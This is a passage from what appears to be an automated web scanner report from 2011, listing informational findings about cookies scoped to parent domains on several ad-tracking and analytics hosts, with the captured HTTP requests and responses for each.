Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl6x0063o010k03505; ipinfo=2ll12l40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; acs=014020a0g0h1lkaebsxzt1sl6xxzt1sl6xxzt1p28s; rdrlst=4041194lkmm960cube0043o0110rdll12l4000000023o010znmlkmhha000000053o0110tell2zip000000013o01; sglst=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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lkaebs01171xcfgwn0ixqhg0sl750073o020k04506; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=4041194lkmm960cube0053o0210rdll12l4000000033o020znmlkmhha000000063o0210tell2zip000000023o02; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: sglst=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; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Set-Cookie: vstcnt=417s010r044smk6127p10024nnav218e202206203210724j2vl118e10f238ca131p10d2; Domain=media6degrees.com; Expires=Tue, 08-Nov-2011 11:49:45 GMT; Path=/
Location: http://www.googleadservices.com/pagead/conversion/1030881291/?label=Ad-QCIPSuQEQi4DI6wM&amp;guid=ON&amp;script=0
Content-Length: 0
Date: Thu, 12 May 2011 11:49:45 GMT


13.47. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K05539 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; 
rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_TX1Q=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
If-Modified-Since: Wed, 27 Apr 2011 19:54:40 GMT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvv9C8Nbjpr557JDEzV6Qmy8vzjOnVlM1b8qoT6P/6jKqFB/AArMvE354eECpVFUpsB/ryF27g64s1oM+s/x82jWjDWUitF+udc3DBM6vFMHdu5LWXcWh1waMn+vD2Pi/6/opLpmA7/Gh0bU5IV0Qrx9dc6VHrKAlCT+hfLClNEUrJSkl2S16oTX7CbgSzypfrpc5VLHYI4c+tj2HEl9lfUdyQ9pWp2gRt3PQ1W9TQEiWXYkLtOkMeKKdqenqP8xd8DJgB9Wm9RFff5Q+bgLy4ePU1qoWyXDHQhYYX7yWeCZeEqilf95qoJAOocGO3qM+iYrceWGHRZq93uAomiKPWg7Z+zLzxGPJDp/fKjMPujah8JN+oi+DaZrQIKIYG6g2TSG1vnYEMZ2JbZVTVZhDxARFZleeWURff9Wx751+tKHaMu/xn3RYaKszrGZA6RlwCt+NuqPoznRX4vck+HldWUVG1A1qbpn3rL2sb/MVkLJXjka3vTLDQkmdGZktW+0pu0LESzKT7GnaXO5eZ+dSyKkA4Q48QAd77LWt2RfYKKjVpi9R/R1/W/RIUlUmivDsAZun9Uj65R1/ShixxdBZtXiudcxuvCsvcW/IdlomzTs7FHCC6AgFwCuDGL4ricj7NcRFR4JxEj7vN++KZFIy18++/lbJXdRgytPK59o4PzVl0T2OcajqS3RSO9NBPwab9+86ccnLs8ds1bjsFzEzKdf/V0iuMCNT7mRXjbxqJdzNQ2zz72+8KSOE9dc/lBj4aC/SyO3LegBHbbnrDHp+grjq8BMcNbn89X3XvY0r/Y8TxrMsLt20IVNBrHwqXzvLeRHtLmVV8weNvSWfkfe5sUSUrPZ1hobafq3mgOKAjfS7tG/VRENDOG21AH7Aspp8ZZAP4A7faTxGwUqJdFHvML5BWA1W48dpbdADNo3WtKmMY4HYawF8Ar2+H04UdeyvCc5nvQgoItg43GpvfcBLVk3+vCQB0wCo2nk3lJqm95+kCZG278se39Cw/iLIG1S3U9l8Fk6j1ydFvxo312YEoSNKI2370IUuJN2kcNHEQRxTLaRjWz9sNRM7mM5TSklUq76M/CaknlqZWm96YXib3fE5d29SK6/9opQVO5ZxJ1GnDnBa9Wu3wg1ngult5Gjm0pyTLRF5YiMj6e8lD2uBVjnTvz9hMTUO56RQBkZMwSiXRTs0QeV0NSQWJBbpg9J19+PqYrvnGFvj1q/LjTeriUaRU9gS2r+Pip5bOvrFA6kBzDJPzJiiYsNl5AwprDcx7KIxZMWNaHqhupRp5HKeDVtNBbHkuhxmbEzAemNrX58a+ern0c60eE/Ti9RfCOzrACEKzCE5EFzwS5Wpi4ek7JevMmowSdz+NZEmFg4WyzC1T0WJ+hNjJ3NNrjWRwjVM/Gf3tTRx6iX2j0PyDr//pq2pdZXZ7YD/zcp8n7qoNWRZbE6V7AEvfIY1u3o7lUJkRzOJRd2VBo28NOxEfzMDFtbZ1gAlvX5g==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:11 GMT; Path=/
Last-Modified: Thu, 12 May 2011 11:37:11 GMT
Cache-Control: max-age=3600, private
Expires: Thu, 12 May 2011 12:37:11 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:10 GMT
Content-Length: 5707

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'K05539';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

13.48. http://m1463.ic-live.com/572/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m1463.ic-live.com
Path:   /572/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /572/?105989004&OVMTC=e&OVKEY=private%20equity%20investors&timestamp=20110512110254&creative=1294844&adcid=4583118 HTTP/1.1
Host: m1463.ic-live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C73A01F5BEE38ED2F3A801AA8E6D7816.mch1-rdr-3; Path=/
Set-Cookie: ngx_userid=173.193.214.243:1305198193830; Domain=.ic-live.com; Expires=Sat, 11-May-2013 11:03:13 GMT; Path=/
Set-Cookie: pid2=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Expires=Fri, 11-May-2012 11:03:13 GMT; Path=/
Set-Cookie: sid1463=1305198194n7FRy5HWuZy599; Domain=.ic-live.com; Path=/
Set-Cookie: cvt572=105989004; Domain=.ic-live.com; Expires=Sat, 11-Jun-2011 11:03:13 GMT; Path=/
Set-Cookie: ngx_105989004=2011-05-12:04:03:13; Domain=.ic-live.com; Expires=Fri, 13-May-2011 11:03:13 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds?FundGroup=EQ&adid=icmsch105989004
Date: Thu, 12 May 2011 11:03:13 GMT
Set-Cookie: Coyote-2-a21011e=a210185:0; path=/
Content-Length: 0


13.49. http://marketing.csscorp.com/acton/bn/1090/visitor.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketing.csscorp.com
Path:   /acton/bn/1090/visitor.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /acton/bn/1090/visitor.gif?ts=1305202212105&ref= HTTP/1.1
Host: marketing.csscorp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.csscorp.com/
Cookie: csscorp=173.193.214.243.1305201370918613; __utma=202015363.216220317.1305202210.1305202210.1305202210.1; __utmb=202015363.1.10.1305202210; __utmc=202015363; __utmz=202015363.1305202210.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LOOPFUSE=9508c8ea-cfac-4a9a-8137-aeaa3d55f0e1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: wp1090=UTCTDDDDDDTVYCAV; Domain=.csscorp.com; Expires=Fri, 11-May-2012 12:10:14 GMT; Path=/
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: image/gif;charset=UTF-8
Content-Length: 43
Date: Thu, 12 May 2011 12:10:13 GMT

GIF89a.............!.......,...........L..;

13.50. http://meter-svc.nytimes.com/meter.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://meter-svc.nytimes.com
Path:   /meter.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meter.js?url=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F09%2Fprivate-equity-has-a-horse-in-this-race%2F&referer=&callback=c1305198171060 HTTP/1.1
Host: meter-svc.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; adxcl=t*26edd=4e32303f:1305112022; nyt-m=E3DB375A9111923DC1D65DE89ACF26F3&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.9.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:03:07 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Server: nginx/0.7.59
Set-Cookie: nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; expires=Tue, 10-May-2016 11:03:07 GMT; path=/; domain=.nytimes.com
Content-Length: 114
Connection: keep-alive

c1305198171060({"hitPaywall":false,"counted":false,"loggedIn":false,"hash":"D30DFD30595EF4324E4B50EE62114094"});

13.51. http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.foxnews.com
Path:   /b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

Issue detail

The cookie set in the response below was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302?AQB=1&ndh=1&t=12/4/2011%206%3A38%3A1%204%20300&ce=utf-8&ns=foxnews&pageName=fbn%3Amarkets%3Afront%3Aarticle&g=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&r=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&cc=USD&ch=markets&events=event1&c1=markets&v1=D%3Dc1&h1=fbn%2Cmarkets&c2=markets&v2=D%3Dc2&c3=markets&v3=D%3Dc3&h3=Referrers&c4=markets&v4=D%3Dc4&v10=D%3DpageName&c11=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&v11=D%3Dc11&c12=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&v12=D%3Dc12&c13=article&v13=D%3Dc13&c14=Charlie%20Gasparino&v14=D%3Dc14&c15=Fox%20Business&v15=D%3Dc15&c16=markets&v16=D%3Dc16&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=markets%3Amarkets%3A2011%3A05%3A03%3Alegendary-deal-maker-ted-forstmann-treated-brain-cancer%3ATed%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&c41=7%3A30AM&v41=7%3A30AM&c42=Thursday&v42=Thursday&c45=Referrers&v45=D%3Dc45&c46=n/a&v46=D%3Dc46&c47=dealbook.nytimes.com&v47=D%3Dc47&v48=dealbook.nytimes.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1046&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 12 May 2011 11:38:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E5E362850118AA-4000010460000E60[CE]; Expires=Tue, 10 May 2016 11:38:45 GMT; Domain=.foxnews.com; Path=/
Location: http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302?AQB=1&pccr=true&vidn=26E5E362850118AA-4000010460000E60&&ndh=1&t=12/4/2011%206%3A38%3A1%204%20300&ce=utf-8&ns=foxnews&pageName=fbn%3Amarkets%3Afront%3Aarticle&g=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&r=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&cc=USD&ch=markets&events=event1&c1=markets&v1=D%3Dc1&h1=fbn%2Cmarkets&c2=markets&v2=D%3Dc2&c3=markets&v3=D%3Dc3&h3=Referrers&c4=markets&v4=D%3Dc4&v10=D%3DpageName&c11=f98dc357cc6bf210VgnVCM10000086c1a8c0RCRD&v11=D%3Dc11&c12=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer&v12=D%3Dc12&c13=article&v13=D%3Dc13&c14=Charlie%20Gasparino&v14=D%3Dc14&c15=Fox%20Business&v15=D%3Dc15&c16=markets&v16=D%3Dc16&c22=New&v22=New&c23=D%3DpageName&c26=1&c27=First%20Visit&c40=markets%3Amarkets%3A2011%3A05%3A03%3Alegendary-deal-maker-ted-forstmann-treated-brain-cancer%3ATed%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&c41=7%3A30AM&v41=7%3A30AM&c42=Thursday&v42=Thursday&c45=Referrers&v45=D%3Dc45&c46=n/a&v46=D%3Dc46&c47=dealbook.nytimes.com&v47=D%3Dc47&v48=dealbook.nytimes.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1046&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava%28TM%29%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Wed, 11 May 2011 11:38:45 GMT
Last-Modified: Fri, 13 May 2011 11:38:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www35
Content-Length: 0
Content-Type: text/plain


13.52. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The cookies set in the response below were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&settings=true&recs=true&widgetJSId=AR_1&key=AYQHSUWJ8576&idx=0&version=37740&ref=http%3A%2F%2Fdealbook.nytimes.com%2F2011%2F05%2F03%2Fforstmann-is-said-to-be-undergoing-treatment-for-brain-cancer%2F&apv=false&rand=0.3115259031765163&sig=poBUI2TM HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIxU/gzm6hl65Q=="; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFKcF+HzHyRcQ=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:58 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1305200338968; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIzfjUZTvndAnxUfc7q0DyhK"; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFbCCininxsHoqtNnPoy33i"; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Thu, 19-May-2011 00:26:58 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Thu, 07-Jun-2012 11:38:58 GMT; Path=/
Set-Cookie: recs-e80144bf1a192df3448809d952ee1141="eC1Ki6F3rC8/svSOgW/oVTpcaosScNndNmo3MfZ/qv3YEjyvRDq1LX6X1QyPUzCq6iss2g1lePRnvUVzvXh96eFC8InIUHABF8oRDv48Y9bI07wQyS0dxtSyPDvDcjnrDOayEsL6HLp5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Thu, 12-May-2011 11:43:58 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:38:58 GMT
Content-Length: 9669

outbrain_rater.returnedOdbData({'response':{'exec_time':22,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203171120','req_id':'6b5cb9196177dce1b62f4444a3713fd2'},'score':{'preferred
...[SNIP]...

13.53. http://odb.outbrain.com/utils/ping.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The cookie set in the response below was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.8784565008245409 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJupcdCqR9LRjXrHG0R5k0w1Cmy75SN8RJIxU/gzm6hl65Q=="; _lvd2="27vfag1ZPzfDGaK+UsDEF0v9S/ktpBpl0hVg0CrIJzZ7WZ/pwAclWtc9oa67TDjH3K7ooLp1QJFKcF+HzHyRcQ=="; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Sun, 06-May-2012 11:38:43 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
